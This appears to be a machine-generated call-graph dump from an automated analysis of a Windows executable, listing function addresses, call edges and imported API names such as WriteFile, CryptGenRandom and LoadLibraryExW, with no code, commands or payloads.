7ff6aa18ba66 38414->38415 38416 7ff6aa1b8d00 48 API calls 38415->38416 38417 7ff6aa18ba78 38416->38417 38687 7ff6aa1b8d38 48 API calls 38417->38687 38419 7ff6aa18ba85 38688 7ff6aa1b8d88 48 API calls 38419->38688 38421 7ff6aa18ba92 38422 7ff6aa18bacd 38421->38422 38689 7ff6aa1b8d88 48 API calls 38421->38689 38691 7ff6aa1b8e3c 38422->38691 38425 7ff6aa18bab2 38690 7ff6aa1b8d88 48 API calls 38425->38690 38427 7ff6aa18bb33 38430 7ff6aa18bb53 38427->38430 38434 7ff6aa1b8e3c 48 API calls 38427->38434 38429 7ff6aa1b8d00 48 API calls 38432 7ff6aa18bb09 38429->38432 38431 7ff6aa18bb6e 38430->38431 38435 7ff6aa1b8e3c 48 API calls 38430->38435 38436 7ff6aa1b8f94 126 API calls 38431->38436 38432->38427 38433 7ff6aa1b8e3c 48 API calls 38432->38433 38433->38427 38434->38430 38435->38431 38436->38437 38437->38354 38439->38307 38440->38313 38442 7ff6aa1a6396 38441->38442 38444 7ff6aa1a63a0 38441->38444 38443 7ff6aa1da444 new 4 API calls 38442->38443 38443->38444 38444->38317 38448 7ff6aa1da44f 38445->38448 38446 7ff6aa1da47a 38446->38330 38447 7ff6aa1e36c0 new 2 API calls 38447->38448 38448->38446 38448->38447 38879 7ff6aa1db314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38448->38879 38880 7ff6aa1db2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38448->38880 38451->38319 38453 7ff6aa1b9926 38452->38453 38454 7ff6aa1b993c 38452->38454 38455 7ff6aa1990b8 75 API calls 38453->38455 38456 7ff6aa1990b8 75 API calls 38454->38456 38457 7ff6aa1b9934 38455->38457 38456->38457 38457->38326 38458->38328 38463 7ff6aa1b96a4 38459->38463 38460 7ff6aa1b97d7 38461 7ff6aa1a2574 126 API calls 38461->38463 38463->38460 38463->38461 38464 7ff6aa1d9b98 216 API calls 38463->38464 38881 7ff6aa1a6498 72 API calls new 38463->38881 38464->38463 38465->38334 38467 7ff6aa19907e 38466->38467 38468 7ff6aa199057 CryptGenRandom CryptReleaseContext 38466->38468 38470 7ff6aa199c9c 11 API calls 38467->38470 38468->38467 38469 7ff6aa199089 38468->38469 38471 7ff6aa199c9c 38469->38471 38470->38469 38495 7ff6aa1cc0a8 GetSystemTime SystemTimeToFileTime 38471->38495 38473 7ff6aa199cc5 38498 7ff6aa1e2d74 38473->38498 38477 7ff6aa199c49 38476->38477 38478 7ff6aa1c9d15 memcpy_s 38476->38478 38480 7ff6aa1c9b70 38477->38480 38478->38477 38501 7ff6aa1c9d74 38478->38501 38483 7ff6aa1c9bad __scrt_fastfail 38480->38483 38485 7ff6aa1c9bd9 __scrt_fastfail 38480->38485 38481 7ff6aa1c9d74 8 API calls 38482 7ff6aa1c9c07 38481->38482 38482->38344 38484 7ff6aa1c9d74 8 API calls 38483->38484 38483->38485 38484->38485 38485->38481 38487 7ff6aa1da61a 38486->38487 38488 7ff6aa199c86 38487->38488 38489 7ff6aa1da6a0 IsProcessorFeaturePresent 38487->38489 38488->38306 38490 7ff6aa1da6b7 38489->38490 38505 7ff6aa1da894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38490->38505 38492 7ff6aa1da6ca 38506 7ff6aa1da66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38492->38506 38496 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38495->38496 38497 7ff6aa1cc0f1 38496->38497 38497->38473 38499 7ff6aa1e2d8b QueryPerformanceCounter 38498->38499 38500 7ff6aa199cd7 38498->38500 38499->38500 38500->38340 38502 7ff6aa1c9dbc 38501->38502 38503 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38502->38503 38504 7ff6aa1c9f40 38503->38504 38504->38478 38505->38492 38508 7ff6aa18a4ea 38507->38508 38509 7ff6aa18a4ee 38508->38509 38698 7ff6aa1a2440 38508->38698 38509->38348 38512 7ff6aa18abbf setbuf 38511->38512 38513 7ff6aa1b8c1c 48 API calls 38512->38513 38519 7ff6aa18abf5 38513->38519 38514 7ff6aa18aca7 38515 7ff6aa18b4af 38514->38515 38516 7ff6aa18acbf 38514->38516 38520 7ff6aa18b4ff 38515->38520 38523 7ff6aa1a2574 126 API calls 38515->38523 38517 7ff6aa18acc8 38516->38517 38518 7ff6aa18b35c 38516->38518 38526 7ff6aa18aea7 38517->38526 38527 7ff6aa18acdd 38517->38527 38530 7ff6aa18ad60 38517->38530 38521 7ff6aa1b8eec 48 API calls 38518->38521 38519->38514 38519->38515 38522 7ff6aa199be0 14 API calls 38519->38522 38727 7ff6aa1b72c0 38520->38727 38525 7ff6aa18b395 38521->38525 38528 7ff6aa18ac34 38522->38528 38523->38520 38529 7ff6aa18b3ad 38525->38529 38726 7ff6aa189e2c 48 API calls 38525->38726 38566 7ff6aa18afda 38526->38566 38716 7ff6aa189b64 48 API calls _UnwindNestedFrames 38526->38716 38531 7ff6aa18ace6 38527->38531 38532 7ff6aa18ad68 38527->38532 38533 7ff6aa1990b8 75 API calls 38528->38533 38537 7ff6aa1b8eec 48 API calls 38529->38537 38536 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38530->38536 38531->38530 38708 7ff6aa1b8eec 38531->38708 38535 7ff6aa1b8eec 48 API calls 38532->38535 38538 7ff6aa18ac8f 38533->38538 38539 7ff6aa18ad9c 38535->38539 38540 7ff6aa18b52b 38536->38540 38541 7ff6aa18b3d4 38537->38541 38538->38514 38543 7ff6aa1a2574 126 API calls 38538->38543 38544 7ff6aa1b8eec 48 API calls 38539->38544 38540->38437 38547 7ff6aa1b8eec 48 API calls 38541->38547 38548 7ff6aa18b3e6 38541->38548 38543->38514 38546 7ff6aa18ada9 38544->38546 38550 7ff6aa1b8eec 48 API calls 38546->38550 38547->38548 38551 7ff6aa1b8eec 48 API calls 38548->38551 38549 7ff6aa1b8eec 48 API calls 38552 7ff6aa18ad31 38549->38552 38553 7ff6aa18adb5 38550->38553 38554 7ff6aa18b451 38551->38554 38555 7ff6aa1b8eec 48 API calls 38552->38555 38556 7ff6aa1b8eec 48 API calls 38553->38556 38557 7ff6aa18b471 38554->38557 38562 7ff6aa1b8eec 48 API calls 38554->38562 38558 7ff6aa18ad46 38555->38558 38561 7ff6aa18adc2 38556->38561 38560 7ff6aa18b486 38557->38560 38563 7ff6aa1b8e3c 48 API calls 38557->38563 38559 7ff6aa1b8f94 126 API calls 38558->38559 38559->38530 38564 7ff6aa1b8f94 126 API calls 38560->38564 38565 7ff6aa1b8d00 48 API calls 38561->38565 38562->38557 38563->38560 38564->38530 38567 7ff6aa18adcf 38565->38567 38576 7ff6aa18aff2 38566->38576 38717 7ff6aa189d98 48 API calls 38566->38717 38569 7ff6aa1990b8 75 API calls 38567->38569 38571 7ff6aa18ae22 38569->38571 38572 7ff6aa1b8e3c 48 API calls 38571->38572 38573 7ff6aa18ae33 38572->38573 38574 7ff6aa1b8e3c 48 API calls 38573->38574 38575 7ff6aa18ae48 38574->38575 38585 7ff6aa1c9ce4 8 API calls 38575->38585 38578 7ff6aa18b02b 38576->38578 38718 7ff6aa189efc 48 API calls _UnwindNestedFrames 38576->38718 38577 7ff6aa18b0af 38579 7ff6aa18b0c8 38577->38579 38720 7ff6aa18a1a0 48 API calls 2 library calls 38577->38720 38578->38577 38719 7ff6aa18a2c8 48 API calls 38578->38719 38583 7ff6aa18b0e2 38579->38583 38721 7ff6aa18a350 48 API calls _UnwindNestedFrames 38579->38721 38587 7ff6aa1b8eec 48 API calls 38583->38587 38586 7ff6aa18ae60 38585->38586 38588 7ff6aa1c9b70 8 API calls 38586->38588 38589 7ff6aa18b0fc 38587->38589 38590 7ff6aa18ae6d 38588->38590 38591 7ff6aa1b8eec 48 API calls 38589->38591 38592 7ff6aa1b8e3c 48 API calls 38590->38592 38593 7ff6aa18b109 38591->38593 38594 7ff6aa18ae80 38592->38594 38595 7ff6aa18b11f 38593->38595 38598 7ff6aa1b8eec 48 API calls 38593->38598 38597 7ff6aa1b8f94 126 API calls 38594->38597 38712 7ff6aa1b8e94 38595->38712 38597->38530 38598->38595 38600 7ff6aa1b8eec 48 API calls 38601 7ff6aa18b147 38600->38601 38602 7ff6aa1b8e94 48 API calls 38601->38602 38603 7ff6aa18b15f 38602->38603 38604 7ff6aa1b8eec 48 API calls 38603->38604 38608 7ff6aa18b16c 38604->38608 38605 7ff6aa18b18a 38606 7ff6aa18b1a9 38605->38606 38723 7ff6aa1b8d88 48 API calls 38605->38723 38607 7ff6aa1b8e94 48 API calls 38606->38607 38610 7ff6aa18b1bc 38607->38610 38608->38605 38722 7ff6aa1b8d88 48 API calls 38608->38722 38612 7ff6aa1b8eec 48 API calls 38610->38612 38613 7ff6aa18b1d6 38612->38613 38615 7ff6aa18b1e9 38613->38615 38724 7ff6aa18c3c8 CharLowerW CharUpperW 38613->38724 38615->38615 38616 7ff6aa1b8eec 48 API calls 38615->38616 38617 7ff6aa18b21f 38616->38617 38618 7ff6aa1b8e3c 48 API calls 38617->38618 38619 7ff6aa18b230 38618->38619 38620 7ff6aa18b247 38619->38620 38621 7ff6aa1b8e3c 48 API calls 38619->38621 38622 7ff6aa1b8f94 126 API calls 38620->38622 38621->38620 38623 7ff6aa18b278 38622->38623 38623->38530 38725 7ff6aa1b70d8 4 API calls 2 library calls 38623->38725 38739 7ff6aa1b8f28 38625->38739 38628 7ff6aa1990b8 38629 7ff6aa199123 38628->38629 38642 7ff6aa1991a9 38628->38642 38629->38642 38757 7ff6aa1c7e74 38629->38757 38630 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38632 7ff6aa18b66e 38630->38632 38644 7ff6aa1a2574 38632->38644 38634 7ff6aa1cd840 WideCharToMultiByte 38635 7ff6aa199157 38634->38635 38636 7ff6aa1991c4 38635->38636 38637 7ff6aa19916a 38635->38637 38635->38642 38776 7ff6aa199338 12 API calls _UnwindNestedFrames 38636->38776 38639 7ff6aa19916f 38637->38639 38640 7ff6aa1991ab 38637->38640 38639->38642 38761 7ff6aa1998b0 38639->38761 38775 7ff6aa19951c 71 API calls _UnwindNestedFrames 38640->38775 38642->38630 38645 7ff6aa1a259e 38644->38645 38646 7ff6aa1a25a5 38644->38646 38645->38356 38647 7ff6aa1a25ab GetStdHandle 38646->38647 38652 7ff6aa1a25ba 38646->38652 38647->38652 38648 7ff6aa1a2619 WriteFile 38648->38652 38649 7ff6aa1a25cf WriteFile 38650 7ff6aa1a260b 38649->38650 38649->38652 38650->38649 38650->38652 38651 7ff6aa1a2658 GetLastError 38651->38652 38652->38645 38652->38648 38652->38649 38652->38651 38656 7ff6aa1a2721 38652->38656 38873 7ff6aa1a3144 9 API calls 2 library calls 38652->38873 38874 7ff6aa19cf34 10 API calls 38652->38874 38875 7ff6aa19c95c 126 API calls 38652->38875 38654 7ff6aa1a2684 SetLastError 38654->38652 38876 7ff6aa19cf14 10 API calls 38656->38876 38660 7ff6aa18161c 48 API calls 38659->38660 38661 7ff6aa18b719 38660->38661 38662 7ff6aa1b8d38 48 API calls 38661->38662 38662->38378 38663->38380 38664->38381 38665->38383 38667 7ff6aa1b9131 38666->38667 38668 7ff6aa1b8fcf 38666->38668 38667->38437 38675 7ff6aa1b905d 38668->38675 38877 7ff6aa19ca6c 48 API calls 3 library calls 38668->38877 38669 7ff6aa1b90e0 38669->38667 38670 7ff6aa1a2574 126 API calls 38669->38670 38670->38667 38671 7ff6aa18161c 48 API calls 38671->38669 38673 7ff6aa1b904c 38878 7ff6aa19ca40 61 API calls _CxxThrowException 38673->38878 38675->38669 38675->38671 38676->38389 38678 7ff6aa18b8f8 CharToOemA 38677->38678 38678->38396 38679->38393 38680->38399 38681->38401 38682->38403 38683->38405 38684->38409 38685->38410 38686->38413 38687->38419 38688->38421 38689->38425 38690->38422 38692 7ff6aa18161c 48 API calls 38691->38692 38693 7ff6aa18baf2 38692->38693 38693->38427 38693->38429 38693->38432 38694->38368 38695->38370 38696->38373 38697->38357 38699 7ff6aa1a2454 38698->38699 38700 7ff6aa1a246a SetFilePointer 38698->38700 38701 7ff6aa1a24ad 38699->38701 38706 7ff6aa19cd00 10 API calls 38699->38706 38700->38701 38702 7ff6aa1a248d GetLastError 38700->38702 38701->38509 38702->38701 38704 7ff6aa1a2497 38702->38704 38704->38701 38707 7ff6aa19cd00 10 API calls 38704->38707 38709 7ff6aa1b8efc 38708->38709 38710 7ff6aa1b8d00 48 API calls 38709->38710 38711 7ff6aa18ad24 38709->38711 38710->38709 38711->38549 38713 7ff6aa1b8eac 38712->38713 38714 7ff6aa1b8d00 48 API calls 38713->38714 38715 7ff6aa18b137 38713->38715 38714->38713 38715->38600 38716->38566 38717->38576 38718->38578 38719->38577 38720->38579 38721->38583 38722->38605 38723->38606 38724->38615 38725->38530 38726->38529 38728 7ff6aa1b72dd 38727->38728 38729 7ff6aa1b7304 38728->38729 38731 7ff6aa1da480 38728->38731 38729->38530 38734 7ff6aa1da444 38731->38734 38732 7ff6aa1da47a 38732->38729 38733 7ff6aa1e36c0 new 2 API calls 38733->38734 38734->38732 38734->38733 38737 7ff6aa1db314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38734->38737 38738 7ff6aa1db2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38734->38738 38742 7ff6aa18161c 38739->38742 38741 7ff6aa18b601 38741->38356 38741->38357 38741->38628 38743 7ff6aa181640 38742->38743 38752 7ff6aa1816aa memcpy_s 38742->38752 38744 7ff6aa18166d 38743->38744 38753 7ff6aa19ca6c 48 API calls 3 library calls 38743->38753 38746 7ff6aa1816d4 38744->38746 38747 7ff6aa18168e 38744->38747 38746->38752 38756 7ff6aa19cb64 8 API calls 38746->38756 38747->38752 38755 7ff6aa19cb64 8 API calls 38747->38755 38748 7ff6aa181661 38754 7ff6aa19cb64 8 API calls 38748->38754 38752->38741 38753->38748 38758 7ff6aa199143 38757->38758 38759 7ff6aa1c7e95 38757->38759 38758->38634 38777 7ff6aa1c7ec8 38759->38777 38762 7ff6aa199920 38761->38762 38771 7ff6aa199b45 38761->38771 38766 7ff6aa19996d 38762->38766 38767 7ff6aa199b75 38762->38767 38809 7ff6aa1c7da8 38762->38809 38763 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38764 7ff6aa199b61 38763->38764 38764->38642 38766->38766 38816 7ff6aa19a0f4 38766->38816 38768 7ff6aa1c7f24 68 API calls 38767->38768 38772 7ff6aa199acb 38768->38772 38770 7ff6aa1999d0 38770->38770 38832 7ff6aa1c7f24 38770->38832 38771->38763 38772->38771 38846 7ff6aa1c4ea8 8 API calls _UnwindNestedFrames 38772->38846 38775->38642 38776->38642 38778 7ff6aa1c7efa memcpy_s 38777->38778 38783 7ff6aa1c7fb5 38778->38783 38791 7ff6aa1cb3f0 38778->38791 38780 7ff6aa1c805c GetCurrentProcessId 38784 7ff6aa1c8034 38780->38784 38782 7ff6aa1c7f7e GetProcAddressForCaller GetProcAddress 38782->38783 38783->38780 38785 7ff6aa1c7ff1 38783->38785 38784->38758 38785->38784 38800 7ff6aa19ca6c 48 API calls 3 library calls 38785->38800 38787 7ff6aa1c801f 38801 7ff6aa19cda4 10 API calls 2 library calls 38787->38801 38789 7ff6aa1c8027 38802 7ff6aa19ca40 61 API calls _CxxThrowException 38789->38802 38803 7ff6aa1da5a0 38791->38803 38794 7ff6aa1cb42c 38805 7ff6aa1b48bc 38794->38805 38795 7ff6aa1cb428 38797 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38795->38797 38799 7ff6aa1c7f72 38797->38799 38799->38782 38799->38783 38800->38787 38801->38789 38802->38784 38804 7ff6aa1cb3fc GetSystemDirectoryW 38803->38804 38804->38794 38804->38795 38806 7ff6aa1b48cb setbuf 38805->38806 38807 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38806->38807 38808 7ff6aa1b493a LoadLibraryExW 38807->38808 38808->38795 38810 7ff6aa1c7e74 68 API calls 38809->38810 38811 7ff6aa1c7ddc 38810->38811 38812 7ff6aa1c7e74 68 API calls 38811->38812 38813 7ff6aa1c7def 38812->38813 38814 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38813->38814 38815 7ff6aa1c7e43 38814->38815 38815->38762 38820 7ff6aa19a15c memcpy_s 38816->38820 38817 7ff6aa19a358 38869 7ff6aa1da774 8 API calls __report_securityfailure 38817->38869 38819 7ff6aa19a352 38868 7ff6aa1da774 8 API calls __report_securityfailure 38819->38868 38820->38817 38820->38819 38823 7ff6aa19a192 38820->38823 38824 7ff6aa19a34d 38820->38824 38822 7ff6aa19a35e 38847 7ff6aa199dd8 38823->38847 38867 7ff6aa1da774 8 API calls __report_securityfailure 38824->38867 38827 7ff6aa19a1d9 38828 7ff6aa199dd8 8 API calls 38827->38828 38829 7ff6aa19a2f1 38827->38829 38828->38827 38830 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38829->38830 38831 7ff6aa19a33b 38830->38831 38831->38770 38833 7ff6aa1c7f5e 38832->38833 38838 7ff6aa1c7fb5 38832->38838 38834 7ff6aa1cb3f0 10 API calls 38833->38834 38833->38838 38836 7ff6aa1c7f72 38834->38836 38835 7ff6aa1c805c GetCurrentProcessId 38845 7ff6aa1c8034 38835->38845 38837 7ff6aa1c7f7e GetProcAddressForCaller GetProcAddress 38836->38837 38836->38838 38837->38838 38838->38835 38839 7ff6aa1c7ff1 38838->38839 38839->38845 38870 7ff6aa19ca6c 48 API calls 3 library calls 38839->38870 38841 7ff6aa1c801f 38871 7ff6aa19cda4 10 API calls 2 library calls 38841->38871 38843 7ff6aa1c8027 38872 7ff6aa19ca40 61 API calls _CxxThrowException 38843->38872 38845->38772 38846->38771 38848 7ff6aa199e46 38847->38848 38851 7ff6aa199e6e __scrt_fastfail 38847->38851 38849 7ff6aa1c9ce4 8 API calls 38848->38849 38850 7ff6aa199e5e 38849->38850 38852 7ff6aa1c9b70 8 API calls 38850->38852 38853 7ff6aa199e85 38851->38853 38855 7ff6aa1c9ce4 8 API calls 38851->38855 38852->38851 38854 7ff6aa1c9ce4 8 API calls 38853->38854 38856 7ff6aa199f97 38854->38856 38855->38853 38857 7ff6aa1c9b70 8 API calls 38856->38857 38860 7ff6aa199fa8 __scrt_fastfail 38857->38860 38858 7ff6aa199fb4 38859 7ff6aa1c9ce4 8 API calls 38858->38859 38861 7ff6aa19a0bb 38859->38861 38860->38858 38862 7ff6aa1c9ce4 8 API calls 38860->38862 38863 7ff6aa1c9b70 8 API calls 38861->38863 38862->38858 38864 7ff6aa19a0c9 38863->38864 38865 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38864->38865 38866 7ff6aa19a0d8 38865->38866 38866->38827 38867->38819 38868->38817 38869->38822 38870->38841 38871->38843 38872->38845 38873->38654 38875->38652 38877->38673 38878->38675 38881->38463 38882 7ff6aa1882f0 38883 7ff6aa188306 38882->38883 38896 7ff6aa18836f 38882->38896 38884 7ff6aa188324 38883->38884 38887 7ff6aa188371 38883->38887 38883->38896 38910 7ff6aa1a2414 61 API calls 38884->38910 38886 7ff6aa188347 38911 7ff6aa1a1998 138 API calls 38886->38911 38887->38896 38919 7ff6aa1a1998 138 API calls 38887->38919 38890 7ff6aa18835e 38912 7ff6aa1a18ac 38890->38912 38893 7ff6aa18b540 147 API calls 38894 7ff6aa18854f 38893->38894 38895 7ff6aa188578 38894->38895 38898 7ff6aa18b540 147 API calls 38894->38898 38897 7ff6aa18b540 147 API calls 38895->38897 38905 7ff6aa18a410 38896->38905 38902 7ff6aa18858f 38897->38902 38898->38895 38899 7ff6aa188634 38900 7ff6aa1da610 _UnwindNestedFrames 8 API calls 38899->38900 38901 7ff6aa188663 38900->38901 38902->38899 38920 7ff6aa189628 175 API calls 38902->38920 38921 7ff6aa1b7a68 38905->38921 38908 7ff6aa18853a 38908->38893 38910->38886 38911->38890 38913 7ff6aa1a18ca 38912->38913 38918 7ff6aa1a18db 38912->38918 38914 7ff6aa1a18de 38913->38914 38915 7ff6aa1a18d6 38913->38915 38913->38918 38946 7ff6aa1a1930 38914->38946 38941 7ff6aa1a1c24 38915->38941 38918->38896 38919->38896 38920->38899 38922 7ff6aa1b7a8d 38921->38922 38924 7ff6aa18a434 38921->38924 38923 7ff6aa1b7aaf 38922->38923 38934 7ff6aa1b7340 157 API calls 38922->38934 38923->38924 38926 7ff6aa1a22e0 12 API calls 38923->38926 38924->38908 38929 7ff6aa1a22e0 38924->38929 38927 7ff6aa1b7adf 38926->38927 38928 7ff6aa1a2440 12 API calls 38927->38928 38928->38924 38935 7ff6aa1a20b4 38929->38935 38932 7ff6aa1a2307 38932->38908 38934->38923 38936 7ff6aa1a2130 38935->38936 38939 7ff6aa1a20d0 38935->38939 38936->38932 38940 7ff6aa19cd00 10 API calls 38936->38940 38937 7ff6aa1a2102 SetFilePointer 38937->38936 38938 7ff6aa1a2126 GetLastError 38937->38938 38938->38936 38939->38937 38942 7ff6aa1a1c37 38941->38942 38943 7ff6aa1a1c3b 38941->38943 38942->38918 38943->38942 38944 7ff6aa1a1c5d 38943->38944 38952 7ff6aa1a2d6c 12 API calls 2 library calls 38944->38952 38947 7ff6aa1a1964 38946->38947 38948 7ff6aa1a194c 38946->38948 38949 7ff6aa1a1988 38947->38949 38953 7ff6aa19c9d0 10 API calls 38947->38953 38948->38947 38950 7ff6aa1a1958 CloseHandle 38948->38950 38949->38918 38950->38947 38952->38942 38953->38949 38954 7ff6aa1ca924 38956 7ff6aa1ca949 sprintf 38954->38956 38955 7ff6aa1ca97f CompareStringA 38956->38955 38957 7ff6aa1cbb70 38960 7ff6aa1cbb80 38957->38960 38969 7ff6aa1cbae8 38960->38969 38962 7ff6aa1cbb79 38964 7ff6aa1cbbd5 LeaveCriticalSection 38966 7ff6aa1cbae8 67 API calls 38964->38966 38965 7ff6aa1cbbc8 SetEvent 38965->38964 38967 7ff6aa1cbb97 38966->38967 38967->38962 38974 7ff6aa191690 38967->38974 38978 7ff6aa1cb974 WaitForSingleObject 38969->38978 38972 7ff6aa1cbb12 38972->38967 38973 7ff6aa1cbb16 EnterCriticalSection LeaveCriticalSection 38973->38972 38975 7ff6aa1916c2 EnterCriticalSection 38974->38975 38976 7ff6aa1916a4 38974->38976 38975->38964 38975->38965 38976->38975 38986 7ff6aa191180 38976->38986 38979 7ff6aa1cb986 GetLastError 38978->38979 38980 7ff6aa1cb9b7 38978->38980 38984 7ff6aa19ca6c 48 API calls 3 library calls 38979->38984 38980->38972 38980->38973 38982 7ff6aa1cb9a6 38985 7ff6aa19ca40 61 API calls _CxxThrowException 38982->38985 38984->38982 38985->38980 38987 7ff6aa1911ab 38986->38987 38995 7ff6aa1911b0 38986->38995 38996 7ff6aa1917c8 216 API calls 2 library calls 38987->38996 38989 7ff6aa19166a 38989->38976 38990 7ff6aa1b6e90 216 API calls 38990->38995 38991 7ff6aa1b6d38 216 API calls 38991->38995 38992 7ff6aa191080 48 API calls 38992->38995 38994 7ff6aa1b6fe8 216 API calls 38994->38995 38995->38989 38995->38990 38995->38991 38995->38992 38995->38994 38997 7ff6aa1917c8 216 API calls 2 library calls 38995->38997 38996->38995 38997->38995 38998 7ff6aa181884 39130 7ff6aa1b34e4 38998->39130 39001 7ff6aa181926 39003 7ff6aa18195b 39001->39003 39194 7ff6aa1b3f98 63 API calls 2 library calls 39001->39194 39002 7ff6aa1b34e4 CompareStringW 39004 7ff6aa1818a6 39002->39004 39011 7ff6aa181970 39003->39011 39195 7ff6aa1a2ed8 100 API calls 3 library calls 39003->39195 39005 7ff6aa1b34e4 CompareStringW 39004->39005 39010 7ff6aa1818b9 39004->39010 39005->39010 39009 7ff6aa181915 39193 7ff6aa19ca40 61 API calls _CxxThrowException 39009->39193 39010->39001 39192 7ff6aa181168 8 API calls 2 library calls 39010->39192 39013 7ff6aa1819b8 39011->39013 39196 7ff6aa1c49f4 48 API calls 39011->39196 39134 7ff6aa185450 39013->39134 39015 7ff6aa1819b0 39197 7ff6aa198444 54 API calls fflush 39015->39197 39021 7ff6aa1872c4 76 API calls 39028 7ff6aa181a12 39021->39028 39022 7ff6aa181ae6 39168 7ff6aa187514 39022->39168 39023 7ff6aa181b04 39172 7ff6aa196c94 39023->39172 39026 7ff6aa181af2 39027 7ff6aa187514 72 API calls 39026->39027 39029 7ff6aa181aff 39027->39029 39028->39022 39028->39023 39030 7ff6aa1da610 _UnwindNestedFrames 8 API calls 39029->39030 39031 7ff6aa182f97 39030->39031 39032 7ff6aa181b13 39188 7ff6aa187148 39032->39188 39034 7ff6aa181c71 39035 7ff6aa181ca7 39034->39035 39036 7ff6aa1863e8 8 API calls 39034->39036 39037 7ff6aa181cd5 39035->39037 39038 7ff6aa181ce4 39035->39038 39039 7ff6aa181c91 39036->39039 39040 7ff6aa1da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39037->39040 39041 7ff6aa1da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39038->39041 39042 7ff6aa1849b8 99 API calls 39039->39042 39046 7ff6aa181cee 39040->39046 39041->39046 39043 7ff6aa181c9d 39042->39043 39044 7ff6aa1863e8 8 API calls 39043->39044 39044->39035 39045 7ff6aa181d50 39048 7ff6aa1da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39045->39048 39046->39045 39047 7ff6aa1cde30 72 API calls 39046->39047 39047->39045 39049 7ff6aa181d62 39048->39049 39050 7ff6aa1cdbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39049->39050 39051 7ff6aa181d7b 39049->39051 39050->39051 39052 7ff6aa1d2bcc 66 API calls 39051->39052 39053 7ff6aa181dba 39052->39053 39126 7ff6aa1aae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39053->39126 39054 7ff6aa181e1c 39056 7ff6aa1810c0 8 API calls 39054->39056 39058 7ff6aa181e5d 39054->39058 39055 7ff6aa181dde std::bad_alloc::bad_alloc 39055->39054 39057 7ff6aa1dba34 _CxxThrowException RtlPcToFileHeader RaiseException 39055->39057 39056->39058 39057->39054 39059 7ff6aa18a410 159 API calls 39058->39059 39124 7ff6aa181ef4 39058->39124 39059->39124 39060 7ff6aa182d0c 39062 7ff6aa1cde30 72 API calls 39060->39062 39071 7ff6aa182d21 39060->39071 39061 7ff6aa182ccc 39061->39060 39125 7ff6aa1a8c80 72 API calls 39061->39125 39062->39071 39063 7ff6aa1a6688 48 API calls 39063->39124 39064 7ff6aa182d86 39068 7ff6aa1c49f4 48 API calls 39064->39068 39106 7ff6aa182dd0 39064->39106 39065 7ff6aa1cb6d0 73 API calls 39123 7ff6aa182005 39065->39123 39066 7ff6aa185e70 169 API calls 39066->39123 39067 7ff6aa198444 54 API calls 39067->39123 39075 7ff6aa182d9e 39068->39075 39069 7ff6aa18a504 208 API calls 39069->39106 39070 7ff6aa1880e4 192 API calls 39070->39106 39071->39064 39073 7ff6aa1c49f4 48 API calls 39071->39073 39072 7ff6aa185928 237 API calls 39072->39123 39076 7ff6aa182d6c 39073->39076 39074 7ff6aa18e6c8 157 API calls 39074->39124 39078 7ff6aa198444 54 API calls 39075->39078 39080 7ff6aa1c49f4 48 API calls 39076->39080 39077 7ff6aa18a410 159 API calls 39077->39124 39081 7ff6aa182da6 39078->39081 39079 7ff6aa1a7c7c 127 API calls 39079->39106 39084 7ff6aa182d79 39080->39084 39087 7ff6aa1a1c24 12 API calls 39081->39087 39082 7ff6aa181168 8 API calls 39082->39106 39083 7ff6aa18b540 147 API calls 39083->39124 39086 7ff6aa198444 54 API calls 39084->39086 39085 7ff6aa19e21c 63 API calls 39085->39123 39086->39064 39087->39106 39088 7ff6aa1a65b4 48 API calls 39088->39124 39089 7ff6aa1cae50 71 API calls 39093 7ff6aa182e39 39089->39093 39090 7ff6aa1a4554 16 API calls 39090->39124 39091 7ff6aa1a1998 138 API calls 39091->39124 39092 7ff6aa1833b4 64 API calls 39092->39106 39093->39089 39095 7ff6aa19ca40 61 API calls 39093->39095 39093->39106 39094 7ff6aa185db4 46 API calls 39094->39124 39095->39106 39096 7ff6aa1a1e80 15 API calls 39096->39124 39097 7ff6aa186188 231 API calls 39097->39106 39098 7ff6aa183f74 138 API calls 39098->39106 39099 7ff6aa18b540 147 API calls 39099->39123 39100 7ff6aa1a7c7c 127 API calls 39100->39124 39101 7ff6aa1a1930 11 API calls 39101->39124 39102 7ff6aa18571c 12 API calls 39102->39124 39103 7ff6aa1bba9c 195 API calls 39103->39106 39104 7ff6aa1c49f4 48 API calls 39104->39106 39105 7ff6aa185004 49 API calls 39105->39124 39106->39069 39106->39070 39106->39079 39106->39082 39106->39092 39106->39093 39106->39097 39106->39098 39106->39103 39106->39104 39107 7ff6aa198444 54 API calls 39106->39107 39107->39106 39108 7ff6aa18a4d0 12 API calls 39108->39124 39109 7ff6aa1a18ac 15 API calls 39109->39124 39110 7ff6aa181168 8 API calls 39110->39124 39111 7ff6aa1cd48c 58 API calls 39111->39124 39112 7ff6aa185e70 169 API calls 39112->39124 39113 7ff6aa1cc0a8 10 API calls 39113->39124 39114 7ff6aa199be0 14 API calls 39114->39124 39115 7ff6aa1a6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39115->39124 39116 7ff6aa1b97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39116->39124 39117 7ff6aa19cbd0 75 API calls 39117->39124 39118 7ff6aa1a5c0c 237 API calls 39118->39124 39119 7ff6aa1a5d40 237 API calls 39119->39124 39120 7ff6aa186114 216 API calls 39120->39124 39121 7ff6aa1c49f4 48 API calls 